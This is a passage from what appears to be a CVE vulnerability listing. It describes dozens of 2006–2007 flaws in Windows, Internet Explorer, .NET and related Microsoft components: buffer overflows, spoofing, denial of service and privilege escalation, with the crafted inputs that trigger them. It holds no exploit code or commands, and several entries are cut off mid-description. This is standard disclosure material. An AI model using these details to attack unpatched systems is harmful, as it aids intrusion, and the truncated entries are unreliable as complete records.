man-in-the-middle (MITM) attacks on web traffic, conduct pharming attacks by poisoning DNS records, and cause a denial of service (erroneous name resolution). [CVE-2007-1537] \Device\NdisTapi (NDISTAPI.sys) in Microsoft Windows XP SP2 and 2003 SP1 uses weak permissions, which allows local users to write to the device and cause a denial of service, as demonstrated by using an IRQL to acquire a spinlock on paged memory via the NdisTapiDispatch function. [CVE-2007-1535] Microsoft Windows Vista establishes a Teredo address without user action upon connection to the Internet, contrary to documentation that Teredo is inactive without user action, which increases the attack surface and allows remote attackers to communicate via Teredo. [CVE-2007-1534] DFSR.exe in Windows Meeting Space in Microsoft Windows Vista remains available for remote connections on TCP port 5722 for 2 minutes after Windows Meeting Space is closed, which allows remote attackers to have an unknown impact by connecting to this port during the time window. [CVE-2007-1533] The Teredo implementation in Microsoft Windows Vista uses the same nonce for communication with different UDP ports within a solicitation session, which makes it easier for remote attackers to spoof the nonce through brute force attacks. [CVE-2007-1532] The neighbor discovery implementation in Microsoft Windows Vista allows remote attackers to conduct a redirect attack by (1) responding to queries by sending spoofed Neighbor Advertisements or (2) blindly sending Neighbor Advertisements. [CVE-2007-1531] Microsoft Windows XP and Vista overwrites ARP table entries included in gratuitous ARP, which allows remote attackers to cause a denial of service (loss of network access) by sending a gratuitous ARP for the address of the Vista host. [CVE-2007-1530] The LLTD Mapper in Microsoft Windows Vista does not properly gather responses to EMIT packets, which allows remote attackers to cause a denial of service (mapping failure) by omitting an ACK response, which triggers an XML syntax error. [CVE-2007-1529] The LLTD Responder in Microsoft Windows Vista does not send the Mapper a response to a DISCOVERY packet if another host has sent a spoofed response first, which allows remote attackers to spoof arbitrary hosts via a network-based race condition, aka the "Total Spoof" attack. [CVE-2007-1528] The LLTD Mapper in Microsoft Windows Vista allows remote attackers to spoof hosts, and nonexistent bridge relationships, into the network topology map by using a MAC address that differs from the MAC address provided in the Real Source field of the LLTD BASE header of a HELLO packet, aka the "Spoof on Bridge" attack. [CVE-2007-1527] The LLTD Mapper in Microsoft Windows Vista does not verify that an IP address in a TLV type 0x07 field in a HELLO packet corresponds to a valid IP address for the local network, which allows remote attackers to trick users into communicating with an external host by sending a HELLO packet with the MW characteristic and a spoofed TLV type 0x07 field, aka the "Spoof and Management URL IP Redirect" attack. [CVE-2007-1512] Stack-based buffer overflow in the AfxOleSetEditMenu function in the MFC component in Microsoft Windows 2000 SP4, XP SP2, and Server 2003 Gold and SP1, and Visual Studio .NET 2002 Gold and SP1, and 2003 Gold and SP1 allows user-assisted remote attackers to have an unknown impact (probably crash) via an RTF file with a malformed OLE object, which results in writing two 0x00 characters past the end of szBuffer, aka the "MFC42u.dll Off-by-Two Overflow." NOTE: this issue is due to an incomplete patch (MS07-012) for CVE-2007-0025. [CVE-2007-1499] Microsoft Internet Explorer 7.0 on Windows XP and Vista allows remote attackers to conduct phishing attacks and possibly execute arbitrary code via a res: URI to navcancl.htm with an arbitrary URL as an argument, which displays the URL in the location bar of the "Navigation Canceled" page and injects the script into the "Refresh the page" link, aka Navigation Cancel Page Spoofing Vulnerability." [CVE-2007-1492] winmm.dll in Microsoft Windows XP allows user-assisted remote attackers to cause a denial of service (infinite loop) via a large cch argument value to the mmioRead function, as demonstrated by a crafted WAV file. [CVE-2007-1347] Microsoft Windows Explorer on Windows 2000 SP4 FR and XP SP2 FR, and possibly other versions and platforms, allows remote attackers to cause a denial of service (memory corruption and crash) via an Office file with crafted document summary information, which causes an error in Ole32.dll. [CVE-2007-1215] Buffer overflow in the Graphics Device Interface (GDI) in Microsoft Windows 2000 SP4 [CVE-2007-1213] The TrueType Fonts rasterizer in Microsoft Windows 2000 SP4 allows local users to gain privileges via crafted TrueType fonts, which result in an uninitialized function pointer. [CVE-2007-1212] Buffer overflow in the Graphics Device Interface (GDI) in Microsoft Windows 2000 SP4 [CVE-2007-1211] Unspecified kernel GDI functions in Microsoft Windows 2000 SP4 [CVE-2007-1209] Use-after-free vulnerability in the Client/Server Run-time Subsystem (CSRSS) in Microsoft Windows Vista does not properly handle connection resources when starting and stopping processes, which allows local users to gain privileges by opening and closing multiple ApiPort connections, which leaves a "dangling pointer" to a process data structure. [CVE-2007-1206] The Virtual DOS Machine (VDM) in the Windows Kernel in Microsoft Windows NT 4.0 [CVE-2007-1205] Unspecified vulnerability in Microsoft Agent (msagent\agentsvr.exe) in Windows 2000 SP4, XP SP2, and Server 2003, 2003 SP1, and 2003 SP2 allows remote attackers to execute arbitrary code via crafted URLs, which result in memory corruption. [CVE-2007-1204] Stack-based buffer overflow in the Universal Plug and Play (UPnP) service in Microsoft Windows XP SP2 allows remote attackers on the same subnet to execute arbitrary code via crafted HTTP headers in request or notification messages, which trigger memory corruption. [CVE-2007-1090] Microsoft Windows Explorer on Windows XP and 2003 allows remote user-assisted attackers to cause a denial of service (crash) via a malformed WMF file, which triggers the crash when the user browses the folder. [CVE-2007-0947] Use-after-free vulnerability in Microsoft Internet Explorer 7 on Windows XP SP2, Windows Server 2003 SP1 or SP2, or Windows Vista allows remote attackers to execute arbitrary code via crafted HTML objects, resulting in accessing deallocated memory of CMarkup objects, aka the second of two "HTML Objects Memory Corruption Vulnerabilities" and a different issue than CVE-2007-0946. [CVE-2007-0946] Unspecified vulnerability in Microsoft Internet Explorer 7 on Windows XP SP2, Windows Server 2003 SP1 or SP2, or Windows Vista allows remote attackers to execute arbitrary code via crafted HTML objects, which results in memory corruption, aka the first of two "HTML Objects Memory Corruption Vulnerabilities" and a different issue than CVE-2007-0947. [CVE-2007-0945] Microsoft Internet Explorer 6 SP1 on Windows 2000 SP4 [CVE-2007-0944] Unspecified vulnerability in the CTableCol::OnPropertyChange method in Microsoft Internet Explorer 5.01 SP4 on Windows 2000 SP4 [CVE-2007-0942] Microsoft Internet Explorer 5.01 SP4 on Windows 2000 SP4 [CVE-2007-0878] Unspecified vulnerability in Microsoft Internet Explorer on Windows Mobile 5.0 allows remote attackers to cause a denial of service (loss of browser and other device functionality) via a malformed WML page, related to an "overflow state." NOTE: it is possible that this issue is related to CVE-2007-0685. [CVE-2007-0843] The ReadDirectoryChangesW API function on Microsoft Windows 2000, XP, Server 2003, and Vista does not check permissions for child objects, which allows local users to bypass permissions by opening a directory with LIST (READ) access and using ReadDirectoryChangesW to monitor changes of files that do not have LIST permissions, which can be leveraged to determine filenames, access times, and other sensitive information. [CVE-2007-0811] Microsoft Internet Explorer 6.0 SP1 on Windows 2000, and 6.0 SP2 on Windows XP, allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via an HTML document containing a certain JavaScript for loop with an empty loop body, possibly involving getElementById. [CVE-2007-0675] A certain ActiveX control in sapi.dll (aka the Speech API) in Speech Components in Microsoft Windows Vista, when the Speech Recognition feature is enabled, allows user-assisted remote attackers to delete arbitrary files, and conduct other unauthorized activities, via a web page with an embedded sound object that contains voice commands to an enabled microphone, allowing for interaction with Windows Explorer. [CVE-2007-0612] Multiple ActiveX controls in Microsoft Windows 2000, XP, 2003, and Vista allows remote attackers to cause a denial of service (Internet Explorer crash) by accessing the bgColor, fgColor, linkColor, alinkColor, vlinkColor, or defaultCharset properties in the (1) giffile, (2) htmlfile, (3) jpegfile, (4) mhtmlfile, (5) ODCfile, (6) pjpegfile, (7) pngfile, (8) xbmfile, (9) xmlfile, (10) xslfile, or (11) wdfile objects in (a) mshtml.dll [CVE-2007-0562] Windows Explorer (explorer.exe) 6.0.2900.2180 in Microsoft Windows XP SP2 allows user-assisted remote attackers to cause a denial of service (application crash) via a crafted .avi file, which triggers the crash when the user right clicks on the file. [CVE-2007-0351] Microsoft Windows XP and Windows Server 2003 do not properly handle user logoff, which might allow local users to gain the privileges of a previous system user, possibly related to user profile unload failure. NOTE: it is not clear whether this is an issue in Windows itself, or an interaction with another product. The issue might involve ZoneAlarm not being able to terminate processes when it cannot prompt the user. [CVE-2007-0214] The HTML Help ActiveX control (Hhctrl.ocx) in Microsoft Windows 2000 SP3, XP SP2 and Professional, 2003 SP1 allows remote attackers to execute arbitrary code via unspecified functions, related to uninitialized parameters. [CVE-2007-0211] The hardware detection functionality in the Windows Shell in Microsoft Windows XP SP2 and Professional, and Server 2003 SP1 allows local users to gain privileges via an unvalidated parameter to a function related to the "detection and registration of new hardware." [CVE-2007-0210] The Window Image Acquisition (WIA) Service in Microsoft Windows XP SP2 allows local users to gain privileges via unspecified vectors involving an "unchecked buffer," probably a buffer overflow. [CVE-2007-0084] DISPUTED Buffer overflow in the Windows NT Message Compiler (MC) 1.00.5239 on Microsoft Windows XP allows local users to gain privileges via a long MC-filename. NOTE: this issue has been disputed by a reliable third party who states that the compiler is not a privileged program, so privilege boundaries cannot be crossed. [CVE-2007-0069] Unspecified vulnerability in the kernel in Microsoft Windows XP SP2, Server 2003, and Vista allows remote attackers to cause a denial of service (CPU consumption) and possibly execute arbitrary code via crafted (1) IGMPv3 and (2) MLDv2 packets that trigger memory corruption, aka "Windows Kernel TCP/IP/IGMPv3 and MLDv2 Vulnerability." [CVE-2007-0066] The kernel in Microsoft Windows 2000 SP4, XP SP2, and Server 2003, when ICMP Router Discovery Protocol (RDP) is enabled, allows remote attackers to cause a denial of service via fragmented router advertisement ICMP packets that trigger an out-of-bounds read, aka "Windows Kernel TCP/IP/ICMP Vulnerability." [CVE-2007-0065] Heap-based buffer overflow in Object Linking and Embedding (OLE) Automation in Microsoft Windows 2000 SP4, XP SP2, Server 2003 SP1 and SP2, Vista, Office 2004 for Mac, and Visual basic 6.0 SP6 allows remote attackers to execute arbitrary code via a crafted script request. [CVE-2007-0064] Heap-based buffer overflow in Windows Media Format Runtime 7.1, 9, 9.5, 9.5 x64 Edition, 11, and Windows Media Services 9.1 for Microsoft Windows 2000, XP, Server 2003, and Vista allows user-assisted remote attackers to execute arbitrary code via a crafted Advanced Systems Format (ASF) file. [CVE-2007-0045] Multiple cross-site scripting (XSS) vulnerabilities in Adobe Acrobat Reader Plugin before 8.0.0, and possibly the plugin distributed with Adobe Reader 7.x before 7.1.4, 8.x before 8.1.7, and 9.x before 9.2, for Mozilla Firefox, Microsoft Internet Explorer 6 SP1, Google Chrome, Opera 8.5.4 build 770, and Opera 9.10.8679 on Windows allow remote attackers to inject arbitrary JavaScript and conduct other attacks via a .pdf URL with a javascript: or res: URI with (1) FDF, (2) XML, and (3) XFDF AJAX parameters, or (4) an arbitrarily named name=URI anchor identifier, aka "Universal XSS (UXSS)." [CVE-2007-0043] The Just In Time (JIT) Compiler service in Microsoft .NET Framework 1.0, 1.1, and 2.0 for Windows 2000, XP, Server 2003, and Vista allows user-assisted remote attackers to execute arbitrary code via unspecified vectors involving an "unchecked buffer," probably a buffer overflow, aka ".NET JIT Compiler Vulnerability". [CVE-2007-0042] Interpretation conflict in ASP.NET in Microsoft .NET Framework 1.0, 1.1, and 2.0 for Windows 2000, XP, Server 2003, and Vista allows remote attackers to access configuration files and obtain sensitive information, and possibly bypass security mechanisms that try to constrain the final substring of a string, via %00 characters, related to use of %00 as a string terminator within POSIX functions but a data character within .NET strings, aka "Null Byte Termination Vulnerability." [CVE-2007-0041] The PE Loader service in Microsoft .NET Framework 1.0, 1.1, and 2.0 for Windows 2000, XP, Server 2003, and Vista allows remote attackers to execute arbitrary code via unspecified vectors involving an "unchecked buffer" and unvalidated message lengths, probably a buffer overflow. [CVE-2007-0040] The LDAP service in Windows Active Directory in Microsoft Windows 2000 Server SP4, Server 2003 SP1 and SP2, Server 2003 x64 Edition and SP2, and Server 2003 for Itanium-based Systems SP1 and SP2 allows remote attackers to execute arbitrary code via a crafted LDAP request with an unspecified number of "convertible attributes." [CVE-2007-0038] Stack-based buffer overflow in the animated cursor code in Microsoft Windows 2000 SP4 through Vista allows remote attackers to execute arbitrary code or cause a denial of service (persistent reboot) via a large length value in the second (or later) anih block of a RIFF .ANI, cur, or .ico file, which results in memory corruption when processing cursors, animated cursors, and icons, a variant of CVE-2005-0416, as originally demonstrated using Internet Explorer 6 and 7. NOTE: this might be a duplicate of CVE-2007-1765 [CVE-2007-0026] The OLE Dialog component in Microsoft Windows 2000 SP4, XP SP2, and 2003 SP1 allows user-assisted remote attackers to execute arbitrary code via an RTF file with a malformed OLE object that triggers memory corruption. [CVE-2007-0025] The MFC component in Microsoft Windows 2000 SP4, XP SP2, and 2003 SP1 and Visual Studio .NET 2000, 2002 SP1, 2003, and 2003 SP1 allows user-assisted remote attackers to execute arbitrary code via an RTF file with a malformed OLE object that triggers memory corruption. NOTE: this might be due to a stack-based buffer overflow in the AfxOleSetEditMenu function in MFC42u.dll. [CVE-2007-0024] Integer overflow in the Vector Markup Language (VML) implementation (vgx.dll) in Microsoft Internet Explorer 5.01, 6, and 7 on Windows 2000 SP4, XP SP2, Server 2003, and Server 2003 SP1 allows remote attackers to execute arbitrary code via a crafted web page that contains unspecified integer properties that cause insufficient memory allocation and trigger a buffer overflow, aka the "VML Buffer Overrun Vulnerability." [CVE-2006-7210] Microsoft Windows 2000, XP, and Server 2003 allows remote attackers to cause a denial of service (cpu consumption) via a PNG image with crafted (1) Width and (2) Height values in the IHDR block. [CVE-2006-7206] Microsoft Internet Explorer 6 on Windows XP SP2 allows remote attackers to cause a denial of service (crash) by creating a ADODB.Recordset object and making a series of calls to the NextRecordset method with a long string argument, which causes an "invalid memory access" in the SysFreeString function, a different issue than CVE-2006-3510 and CVE-2006-3899. [CVE-2006-7066] Microsoft Internet Explorer 6 on Windows XP SP2 allows remote attackers to cause a denial of service (crash) by creating an object inside an iframe, deleting the frame by setting its location.href to about:blank, then accessing a property of the object within the deleted frame, which triggers a NULL pointer dereference. NOTE: it was later reported that 7.0.6000.16473 and earlier are also affected. [CVE-2006-6902] Unspecified vulnerability in the Bluetooth stack in Microsoft Windows Mobile Pocket PC edition allows remote attackers to gain administrative access (aka Remote Root) via unspecified vectors. [CVE-2006-6901] Unspecified vulnerability in the Bluetooth stack in Microsoft Windows allows remote attackers to gain administrative access (aka Remote Root) via unspecified vectors. [CVE-2006-6797] The Client Server Run-Time Subsystem (CSRSS) in Microsoft Windows allows local users to cause a denial of service (crash) or read arbitrary memory from csrss.exe via crafted arguments to the NtRaiseHardError function with status 0x50000018, a different vulnerability than CVE-2006-6696. [CVE-2006-6753] Event Viewer (eventvwr.exe) in Microsoft Windows does not properly display log data that contains '%' (percent) characters, which might make it impossible to use Event Viewer to determine the actual data that triggered an event, and might produce long strings that are not properly handled by certain processes that rely on Event Viewer. [CVE-2006-6723] The Workstation service in Microsoft Windows 2000 SP4 and XP SP2 allows remote attackers to cause a denial of service (memory consumption) via a large maxlen value in an NetrWkstaUserEnum RPC request. [CVE-2006-6696] Double free vulnerability in Microsoft Windows 2000, XP, 2003, and Vista allows local users to gain privileges by calling the MessageBox function with a MB_SERVICE_NOTIFICATION message with crafted data, which sends a HardError message to Client/Server Runtime Server Subsystem (CSRSS) process, which is not properly handled when invoking the UserHardError and GetHardErrorText functions in WINSRV.DLL. [CVE-2006-6659] The Microsoft Office Outlook Recipient ActiveX control (ole32.dll) in Windows XP SP2 allows remote attackers to cause a denial of service (Internet Explorer 7 hang) via crafted HTML. [CVE-2006-6602] explorer.exe in Windows Explorer 6.00.2900.2180 in Microsoft Windows XP SP2 allows user-assisted remote attackers to cause a denial of service via a crafted WMV file. [CVE-2006-6601] Windows Media Player 10.00.00.4036 in Microsoft Windows XP SP2 allows user-assisted remote attackers to cause a denial of service via a .MID (MIDI) file with a malformed header chunk without any track chunks, possibly involving (1) number of tracks of (2) time division fields that are set to 0. [CVE-2006-6579] Microsoft Windows XP has weak permissions (FILE_WRITE_DATA and FILE_READ_DATA for Everyone) for %WINDIR%\pchealth\ERRORREP\QHEADLES, which allows local users to write and read files in this folder, as demonstrated by an ASP shell that has write access by IWAM_machine and read access by IUSR_Machine. [CVE-2006-6296] The RpcGetPrinterData function in the Print Spooler (spoolsv.exe) service in Microsoft Windows 2000 SP4 and earlier, and possibly Windows XP SP1 and earlier, allows remote attackers to cause a denial of service (memory consumption) via an RPC request that specifies a large 'offered' value (output buffer size), a variant of CVE-2005-3644. [CVE-2006-6252] Microsoft Windows Live Messenger 8.0 and earlier, when gestual emoticons are enabled, allows remote attackers to cause a denial of service (CPU consumption) via a long string composed of ":D" sequences, which are interpreted as emoticons. [CVE-2006-6134] Heap-based buffer overflow in the WMCheckURLScheme function in WMVCORE.DLL in Microsoft Windows Media Player (WMP) 10.00.00.4036 on Windows XP SP2, Server 2003, and Server 2003 SP1 allows remote attackers to cause a denial of service (application crash) and execute arbitrary code via a long HREF attribute, using an unrecognized protocol, in a REF element in an ASX PlayList file. [CVE-2006-5758] The Graphics Rendering Engine in Microsoft Windows 2000 through 2000 SP4 and Windows XP through SP2 maps GDI Kernel structures on a global shared memory section that is mapped with read-only permissions, but can be remapped by other processes as read-write, which allows local users to cause a denial of service (memory corruption and crash) and gain privileges by modifying the kernel structures. [CVE-2006-5745] Unspecified vulnerability in the setRequestHeader method in the XMLHTTP (XML HTTP) ActiveX Control 4.0 in Microsoft XML Core Services 4.0 on Windows, when accessed by Internet Explorer, allows remote attackers to execute arbitrary code via crafted arguments that lead to memory corruption, a different vulnerability than CVE-2006-4685. NOTE: some of these details are obtained from third party information. [CVE-2006-5614] Microsoft Windows NAT Helper Components (ipnathlp.dll) on Windows XP SP2, when Internet Connection Sharing is enabled, allows remote attackers to cause a denial of service (svchost.exe crash) via a malformed DNS query, which results in a null pointer dereference. [CVE-2006-5586] The Graphics Rendering Engine in Microsoft Windows 2000 SP4 and XP SP2 allows local users to gain privileges via "invalid application window sizes" in layered application windows, aka the "GDI Invalid Window Size Elevation of Privilege Vulnerability." [CVE-2006-5585] The Client-Server Run-time Subsystem in Microsoft Windows XP SP2 and Server 2003 allows local users to gain privileges via a crafted file manifest within an application, aka "File Manifest Corruption Vulnerability." [CVE-2006-5584] The Remote Installation Service (RIS) in Microsoft Windows 2000 SP4 uses a TFTP server that allows anonymous access, which allows remote attackers to upload and overwrite arbitrary files to gain privileges on systems that use RIS. [CVE-2006-5583] Buffer overflow in the SNMP Service in Microsoft Windows 2000 SP4, XP SP2, Server 2003, Server 2003 SP1, and possibly other versions allows remote attackers to execute arbitrary code via a crafted SNMP packet, aka "SNMP Memory Corruption Vulnerability." [CVE-2006-5448] The drmstor.dll ActiveX object in Microsoft Windows Digital Rights Management System (DRM) allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long parameter to the StoreLicense function, which triggers "memory corruption" and possibly a buffer overflow. [CVE-2006-5270] Integer overflow in the Microsoft Malware Protection Engine (mpengine.dll), as used by Windows Live OneCare, Antigen, Defender, and Forefront Security, allows user-assisted remote attackers to execute arbitrary code via a crafted PDF file. [CVE-2006-5028] Directory traversal vulnerability in filemanager/filemanager.php in SWsoft Plesk 7.5 Reload and Plesk 7.6 for Microsoft Windows allows remote attackers to list arbitrary directories via a ../ (dot dot slash) in the file parameter in a chdir action. [CVE-2006-4868] Stack-based buffer overflow in the Vector Graphics Rendering engine (vgx.dll), as used in Microsoft Outlook and Internet Explorer 6.0 on Windows XP SP2, and possibly other versions, allows remote attackers to execute arbitrary code via a Vector Markup Language (VML) file with a long fill parameter within a rect tag. [CVE-2006-4702] Buffer overflow in the Windows Media Format Runtime in Microsoft Windows Media Player (WMP) 6.4 and Windows XP SP2, Server 2003, and Server 2003 SP1 allows remote attackers to execute arbitrary code via a crafted Advanced Systems Format (ASF) file. [CVE-2006-4696] Unspecified vulnerability in the Server service in Microsoft Windows 2000 SP4, Server 2003 SP1 and earlier, and XP SP2 and earlier allows remote attackers to execute arbitrary code via a crafted packet, aka "SMB Rename Vulnerability." [CVE-2006-4694] Unspecified vulnerability in PowerPoint in Microsoft Office 2000, Office XP and Office 2003 allows user-assisted attackers to execute arbitrary code via a crafted record in a PPT file, as exploited by malware such as Exploit:Win32/Controlppt.W, Exploit:Win32/Controlppt.X, and Exploit-PPT.d/Trojan.PPDropper.F. NOTE: it has been reported that the attack vector involves SlideShowWindows.View.GotoNamedShow. [CVE-2006-4692] Argument injection vulnerability in the Windows Object Packager (packager.exe) in Microsoft Windows XP SP1 and SP2 and Server 2003 SP1 and earlier allows remote user-assisted attackers to execute arbitrary commands via a crafted file with a "/" (slash) character in the filename of the Command Line property, followed by a valid file extension, which causes the command before the slash to be executed, aka "Object Packager Dialogue Spoofing Vulnerability." [CVE-2006-4691] Stack-based buffer overflow in the NetpManageIPCConnect function in the Workstation service (wkssvc.dll) in Microsoft Windows 2000 SP4 and XP SP2 allows remote attackers to execute arbitrary code via NetrJoinDomain2 RPC messages with a long hostname. [CVE-2006-4689] Unspecified vulnerability in the driver for the Client Service for NetWare (CSNW) in Microsoft Windows 2000 SP4, XP SP2, and Server 2003 up to SP1 allows remote attackers to cause a denial of service (hang and reboot) via has unknown attack vectors, aka "NetWare Driver Denial of Service Vulnerability." [CVE-2006-4688] Buffer overflow in Client Service for NetWare (CSNW) in Microsoft Windows 2000 SP4, XP SP2, and Server 2003 up to SP1 allows remote attackers to execute arbitrary code via crafted messages, aka "Client Service for NetWare Memory Corruption Vulnerability." [CVE-2006-4495] Microsoft Internet Explorer allows remote attackers to cause a denial of service (memory corruption) and possibly execute arbitrary code by instantiating certain Windows 2000 ActiveX COM Objects including (1) ciodm.dll, (2) myinfo.dll, (3) msdxm.ocx, and (4) creator.dll. [CVE-2006-4219] The Terminal Services COM object (tsuserex.dll) allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code by instantiating it as an ActiveX object in Internet Explorer 6.0 SP1 on Microsoft Windows 2003 EE SP1 CN. [CVE-2006-4138] Multiple unspecified vulnerabilities in Microsoft Windows Help File viewer (winhlp32.exe) allow user-assisted attackers to execute arbitrary code via crafted HLP files. [CVE-2006-4071] Sign extension vulnerability in the createBrushIndirect function in the GDI library (gdi32.dll) in Microsoft Windows XP, Server 2003, and possibly other versions, allows user-assisted attackers to cause a denial of service (application crash) via a crafted WMF file. [CVE-2006-4066] The Graphical Device Interface Plus library (gdiplus.dll) in Microsoft Windows XP SP2 allows context-dependent attackers to cause a denial of service (application crash) via certain images that trigger a divide-by-zero error, as demonstrated by a (1) .ico file, (2) .png file that crashes MSN Messenger, and (3) .jpg file that crashes Internet Explorer. NOTE: another researcher has not been able to reproduce this issue. [CVE-2006-3992] Unspecified vulnerability in the Centrino (1) w22n50.sys, (2) w22n51.sys, (3) w29n50.sys, and (4) w29n51.sys Microsoft Windows drivers for Intel 2200BG and 2915ABG PRO/Wireless Network Connection before 10.5 with driver 9.0.4.16 allows remote attackers to execute arbitrary code via certain frames that trigger memory corruption. [CVE-2006-3944] Microsoft Internet Explorer 6 on Windows XP SP2 allows remote attackers to cause a denial of service (crash) via a (1) Forms.ListBox.1 or (2) Forms.ListBox.1 object with the ListWidth property set to (a) 0x7fffffff, which triggers an integer overflow exception, or to (b) 0x7ffffffe, which triggers a null dereference. [CVE-2006-3943] Stack-based buffer overflow in NDFXArtEffects in Microsoft Internet Explorer 6 on Windows XP SP2 allows remote attackers to cause a denial of service (crash) via long (1) RGBExtraColor, (2) RGBForeColor, and (3) RGBBackColor properties. [CVE-2006-3942] The server driver (srv.sys) in Microsoft Windows NT 4.0, 2000, XP, and Server 2003 allows remote attackers to cause a denial of service (system crash) via an SMB_COM_TRANSACTION SMB message that contains a string without null character termination, which leads to a NULL dereference in the ExecuteTransaction function, possibly related to an "SMB PIPE," aka the "Mailslot DOS" vulnerability. NOTE: the name "Mailslot DOS" was derived from incomplete initial research [CVE-2006-3915] Microsoft Internet Explorer 6 on Windows XP SP2 allows remote attackers to cause a denial of service (crash) by iterating over any native function, as demonstrated with the window.alert function, which triggers a null dereference. [CVE-2006-3899] Microsoft Internet Explorer 6.0 on Windows XP SP2 allows remote attackers to cause a denial of service (application crash) by calling the stringToBinary function of the CEnroll.CEnroll.2 ActiveX object with a long second argument, which triggers an invalid memory access inside the SysAllocStringLen function. [CVE-2006-3898] Microsoft Internet Explorer 6.0 on Windows XP SP2 allows remote attackers to cause a denial of service (application crash) by calling the Click method of the Internet.HHCtrl.1 ActiveX object before initializing the URL, which triggers a null dereference. [CVE-2006-3897] Stack overflow in Microsoft Internet Explorer 6 on Windows 2000 allows remote attackers to cause a denial of service (application crash) by creating an NMSA.ASFSourceMediaDescription.1 ActiveX object with a long dispValue property. [CVE-2006-3880] DISPUTED Microsoft Windows NT 4.0, Windows 2000, Windows XP, and Windows Small Business Server 2003 allow remote attackers to cause a denial of service (IP stack hang) via a continuous stream of packets on TCP port 135 that have incorrect TCP header checksums and random numbers in certain TCP header fields, as demonstrated by the Achilles Windows Attack Tool. NOTE: the researcher reports that the Microsoft Security Response Center has stated "Our investigation which has included code review, review of the TCPDump, and attempts on reproing the issue on multiple fresh installs of various Windows Operating Systems have all resulted in non confirmation." [CVE-2006-3873] Heap-based buffer overflow in URLMON.DLL in Microsoft Internet Explorer 6 SP1 on Windows 2000 and XP SP1, with versions the MS06-042 patch before 20060912, allows remote attackers to cause a denial of service (crash) or execute arbitrary code via a long URL in a GZIP-encoded website that was the target of an HTTP redirect, due to an incomplete fix for CVE-2006-3869. [CVE-2006-3869] Heap-based buffer overflow in URLMON.DLL in Microsoft Internet Explorer 6 SP1 on Windows 2000 and XP SP1, with versions the MS06-042 patch before 20060824, allows remote attackers to cause a denial of service (crash) or execute arbitrary code via a long URL on a website that uses HTTP 1.1 compression. [CVE-2006-3730] Integer overflow in Microsoft Internet Explorer 6 on Windows XP SP2 allows remote attackers to cause a denial of service (crash) and execute arbitrary code via a 0x7fffffff argument to the setSlice method on a WebViewFolderIcon ActiveX object, which leads to an invalid memory copy. [CVE-2006-3648] Unspecified vulnerability in Microsoft Windows 2000 SP4, XP SP1 and SP2, Server 2003 and 2003 SP1, allows remote attackers to execute arbitrary code via unspecified vectors involving unhandled exceptions, memory resident applications, and incorrectly "unloading chained exception." [CVE-2006-3643] Cross-site scripting (XSS) vulnerability in Internet Explorer 5.01 and 6 in Microsoft Windows 2000 SP4 permits access to local "HTML-embedded resource files" in the Microsoft Management Console (MMC) library, which allows remote authenticated users to execute arbitrary commands, aka "MMC Redirect Cross-Site Scripting Vulnerability." [CVE-2006-3510] The Remote Data Service Object (RDS.DataControl) in Microsoft Internet Explorer 6 on Windows 2000 allows remote attackers to cause a denial of service (crash) via a series of operations that result in an invalid length calculation when using SysAllocStringLen, then triggers a buffer over-read. [CVE-2006-3471] Microsoft Internet Explorer 6 on Windows XP allows remote attackers to cause a denial of service (crash) via a table with a frameset as a child, which triggers a null dereference, as demonstrated using the appendChild method. [CVE-2006-3448] Buffer overflow in the Step-by-Step Interactive Training in Microsoft Windows 2000 SP4, XP SP2 and Professional, and Server 2003 SP1 allows remote attackers to execute arbitrary code via a long Syllabus string in crafted bookmark link files (cbo, cbl, or .cbm), a different issue than CVE-2005-1212. [CVE-2006-3445] Integer overflow in the ReadWideString function in agentdpv.dll in Microsoft Agent on Microsoft Windows 2000 SP4, XP SP2, and Server 2003 up to SP1 allows remote attackers to execute arbitrary code via a large length value in an .ACF file, which results in a heap-based buffer overflow. [CVE-2006-3444] Unspecified vulnerability in the kernel in Microsoft Windows 2000 SP4, probably a buffer overflow, allows local users to obtain privileges via unspecified vectors involving an "unchecked buffer." [CVE-2006-3443] Untrusted search path vulnerability in Winlogon in Microsoft Windows 2000 SP4, when SafeDllSearchMode is disabled, allows local users to gain privileges via a malicious DLL in the UserProfile directory, aka "User Profile Elevation of Privilege Vulnerability." [CVE-2006-3442] Unspecified vulnerability in Pragmatic General Multicast (PGM) in Microsoft Windows XP SP2 and earlier allows remote attackers to execute arbitrary code via a crafted multicast message. [CVE-2006-3441] Buffer overflow in the DNS Client service in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 allows remote attackers to execute arbitrary code via a crafted record response. NOTE: while MS06-041 implies that there is a single issue, there are multiple vectors, and likely multiple vulnerabilities, related to (1) a heap-based buffer overflow in a DNS server response to the client, (2) a DNS server response with malformed ATMA records, and (3) a length miscalculation in TXT, HINFO, X25, and ISDN records. [CVE-2006-3440] Buffer overflow in the Winsock API in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 allows remote attackers to execute arbitrary code via unknown vectors, aka "Winsock Hostname Vulnerability." [CVE-2006-3439] Buffer overflow in the Server Service in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 allows remote attackers, including anonymous users, to execute arbitrary code via a crafted RPC message, a different vulnerability than CVE-2006-1314. [CVE-2006-3209] DISPUTED The Task scheduler (at.exe) on Microsoft Windows XP spawns each scheduled process with SYSTEM permissions, which allows local users to gain privileges. NOTE: this issue has been disputed by third parties, who state that the Task scheduler is limited to the Administrators group by default upon installation. [CVE-2006-2766] Buffer overflow in INETCOMM.DLL, as used in Microsoft Internet Explorer 6.0 through 6.0 SP2, Windows Explorer, Outlook Express 6, and possibly other programs, allows remote user-assisted attackers to cause a denial of service (application crash) via a long mhtml URI in the URL value in a URL file. [CVE-2006-2386] Unspecified vulnerability in Microsoft Outlook Express 6 and earlier allows remote attackers to execute arbitrary code via a crafted contact record in a Windows Address Book (WAB) file. [CVE-2006-2380] Microsoft Windows 2000 SP4 does not properly validate an RPC server during mutual authentication over SSL, which allows remote attackers to spoof an RPC server, aka the "RPC Mutual Authentication Vulnerability." [CVE-2006-2379] Buffer overflow in the TCP/IP Protocol driver in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 and earlier allows remote attackers to execute arbitrary code via unknown vectors related to IP source routing. [CVE-2006-2378] Buffer overflow in the ART Image Rendering component (jgdw400.dll) in Microsoft Windows XP SP1 and Sp2, Server 2003 SP1 and earlier, and Windows 98 and Me allows remote attackers to execute arbitrary code via a crafted ART image that causes heap corruption. [CVE-2006-2376] Integer overflow in the PolyPolygon function in Graphics Rendering Engine on Microsoft 